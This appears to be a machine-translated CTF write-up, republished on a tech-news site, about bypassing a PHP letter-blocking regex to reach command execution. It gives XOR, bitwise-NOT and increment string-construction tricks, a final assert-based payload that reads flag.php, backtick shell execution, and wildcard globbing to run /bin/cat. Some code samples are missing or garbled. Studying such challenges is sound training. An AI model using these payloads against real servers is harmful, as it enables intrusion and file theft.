Shulou(Shulou.com)05/31 Report--

This article introduces you how to talk about command execution in CTF from a PHP topic, the content is very detailed, interested friends can refer to, hope to be helpful to you.

When I was about to sleep, I opened bilibili and found a user leaving a message to the effect that he asked me to help me look at a problem. I happened to be free at that time, so I opened the link he sent. The code is as follows.

It's obviously the subject of PHP code auditing, and arbitrary command execution can be done simply by bypassing the if on the third line.

Solution idea

After looking at the code, I think it is a common topic. For the regular expression / a-zA-Z/, we can use the characteristics of the PHP dynamic function to construct a string.

For the desired string, we can construct it in three ways:

1. XOR

For strings in PHP, the result of two strings XOR is to XOR the two strings bit by bit, returning a new string. Then we can use this feature to construct.

For example, if we need to construct phpinfo, we can use a script to get ('0302181,' @ [@ [_ ^ ^') these two strings, as follows:

Where valid is the available character and answer is the string we need to construct. So when we get this string, how do we execute it? We can use a variable to store the XOR value of two strings, and then let the variable execute a dynamic function. For variables, because PHP's variable naming rules are the same as those of C language, we can use underscores to name them, as shown below:

two。 Inverse structure

Similar to the first, it is based on the characteristics of PHP string bit operations (bit by bit). On the other hand, some cases of anti-construction are more convenient than XOR construction, because in the case of XOR, some characters cannot be constructed directly through other characters. on the other hand, the inverse can be constructed by using Chinese characters or other special characters (there will not be any problem that will limit a Chinese character). For example, we can get the letter s through ~ ('and' {2}). At this time, if you want to use XOR to construct, you have to find two special characters with an XOR value of s.

The script for taking anti-constructions is similar to XOR constructs and is not given here.

3. Self-increasing structure

`+ +'a' = ='b'`

This feature takes advantage of the fact that PHP is a weakly typed language. When operating on variables, PHP will implicitly convert its variable types, and many code audit topics also take advantage of this feature.

Encounter obstacles

With the above idea, and also successfully executed phpinfo (), the next step is not to directly construct a command execution function to read the file. That's what I thought at that time, so I constructed passthru (), system (), shell_exec (), exec () and other functions, all of which were blocked and did not echo. After further debugging, it is found that these functions are disabled (by adding a print function to the end of the function to see if it is executed).

I stayed here for a long time and tried to print $GLOBALS and so on without any useful information. Finally, by using the glob () function to scan the directory, we found the flag.php file and file_get_contents () to get it. The final payload is as follows

? mess=$_= "`0123" ^ "? `~ ``"; ${$_} [_] (${$_} [_]); & _ = assert&__=print_r (base64_encode (file_put_contents ("flag.php")

Finally, the interface can be used to get the final flag. Instead of going to a construction string XOR in the final payload, because it was too long, I constructed a dynamic function of $_ post [_] ($_ post [_]) so that I could write the function directly in other arguments.

Deep analysis

This is the end of the topic, in fact, it is not very difficult, first of all, through the features to construct dynamic functions, and then found that command execution is disabled, you can know to use other functions to obtain information on the line. But after finishing this problem, it not only made me think, is this the only way to execute commands in PHP? definitely not. Therefore, I have summarized several new command execution skills for your reference.

1. When the print function is disabled

If you don't have the print function, it means you can't see the echo, and you can't get the information even if the command is executed successfully, so you have to use other ways to get the echo.

First of all, there are many ways used by blog on the Internet. if phpinfo finds that curl is turned on, or other file transfer extensions, it can build a target machine, store all the access information in the database or files, and then send the echo information to your target address, so that you can read the log. This way is not very convenient and has certain limitations. What I want to introduce here is a new approach.

If you have used Django or jsp to develop web, you must know that you can output a variable using {{xxx}} or. Is there such a way in PHP? the answer is yes. PHP can output a variable, so if you use it, you only need to construct the following payload

$_ = "xxx";? >

This allows you to print the contents of the variable $_ to the screen, and the key point is that this output mode is on by default, and it is easy for administrators to ignore this option. So you might as well give it a try when doing the questions.

two。 Other ways of executing commands

When system,passthru is not available, the Internet will tell you that you can use popen,proc_open pipeline commands to execute commands, of course, this is no problem, but here I introduce you a new way, using backquotes, in PHP, the content enclosed by two backquotes will be executed as a shell command and the output information will be returned, so you can construct the following payload to execute the command

$_ = `ls`

3. Commands that cannot be executed using numeric letters

When alphanumeric characters cannot be used, of course you can use the above method to construct strings for execution, but here are some new things. Shell in linux supports regular expressions. When you forget some characters, you can use?% * instead. After testing, the matching method here is also matched in order, so you can check the order under the / bin directory in your linux. To get some commands that can be used, such as

= > / bin/cat

In that case, if you want to get / var/www/html/index.php (you have to thank the apache default directory for being so deep), you can get it directly using the

This article is only some things that are postponed for this problem, in the real problem, the situation may be more complicated, such as limiting length, limiting parameters, and so on, and our approach can not be the same, and sometimes we may even use some CVE loopholes. The purpose of this article is to tell readers something new that they may not have seen before.

On how to talk about the execution of commands in PHP from a CTF topic is shared here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.